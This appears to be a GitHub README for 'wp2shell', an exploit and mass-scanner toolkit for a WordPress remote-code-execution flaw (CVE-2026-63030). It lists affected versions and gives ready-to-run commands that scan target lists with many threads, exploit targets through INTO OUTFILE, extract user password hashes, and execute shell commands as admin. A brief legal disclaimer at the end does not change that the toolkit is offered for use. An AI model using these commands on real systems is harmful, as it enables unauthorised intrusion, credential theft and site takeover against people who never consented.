๐ wp2shell - WordPress CVE-2026-63030 Vulnerability Scanner & Exploit
July 18, 2026 ยท View on GitHub
โก Fast, Real-time Vulnerability Scanner & Exploit for CVE-2026-63030 (wp2shell)
๐ Overview
wp2shell is a comprehensive toolkit for detecting and exploiting CVE-2026-63030, a critical vulnerability in WordPress that allows unauthenticated attackers to execute remote code via REST API batch route confusion combined with SQL injection.
๐ What is CVE-2026-63030?
CVE-2026-63030 (wp2shell) is a critical vulnerability discovered by Adam Kues (Assetnote / Searchlight Cyber) that affects WordPress core. It combines two bugs:
- GHSA-ff9f-jf42-662q - REST Batch Route Confusion
- GHSA-fpp7-x2x2-2mjf -
author__not_inSQL Injection
๐ Affected Versions
| Version Range | Impact | Status |
|---|---|---|
| 6.9.0 - 6.9.4 | ๐ด RCE (Critical) | โ Vulnerable |
| 7.0.0 - 7.0.1 | ๐ด RCE (Critical) | โ Vulnerable |
| 6.8.0 - 6.8.5 | ๐ก SQLi (High) | โ Vulnerable |
| 6.9.5+ / 7.0.2+ | โ Patched | โ Safe |
๐ฆ Clone & Setup
# Clone repository
git clone https://github.com/Lutfifakee-Project/wp2shell.git
cd wp2shell
# No dependencies required - uses Python standard library only!
# Python 3.7+ required
๐ ๏ธ Tools Included
1๏ธโฃ wp2shell_scanner.py - Fast Scanner
Multi-threaded real-time scanner for large-scale vulnerability detection.
# Basic scan
python wp2shell_scanner.py -f list.txt -o results.txt
# Skip SQLi test (faster)
python wp2shell_scanner.py -f list.txt -o results.txt --no-sqli-test
# JSON output
python wp2shell_scanner.py -f list.txt -j
2๏ธโฃ wp2shell_intooutfile.py - INTO OUTFILE Exploit
Demonstrates the INTO OUTFILE RCE variant (requires MySQL FILE privilege).
# Single target
python3 wp2shell_intooutfile.py https://target.com
# Multiple targets
python3 wp2shell_intooutfile.py -f list.txt -t 10
3๏ธโฃ wp2shell-exploit.py - Single-File Exploit
Portable, single-file version of the exploit with full functionality.
# Check vulnerability
python wp2shell-exploit.py check https://target.com
# Read users (extract password hashes)
python wp2shell-exploit.py read https://target.com --preset users
# Read fingerprint
python wp2shell-exploit.py read https://target.com --preset fingerprint
# Execute command (after cracking hash)
python wp2shell-exploit.py shell https://target.com --user admin --password "cracked" --cmd "id"
โ ๏ธ Legal Disclaimer
IMPORTANT: This tool is for educational and authorized testing purposes only.
- Only use on systems you own or have explicit written permission to test.
- Unauthorized access to computer systems is illegal.
- The developers assume no responsibility for misuse of this software. Use responsibly and ethically.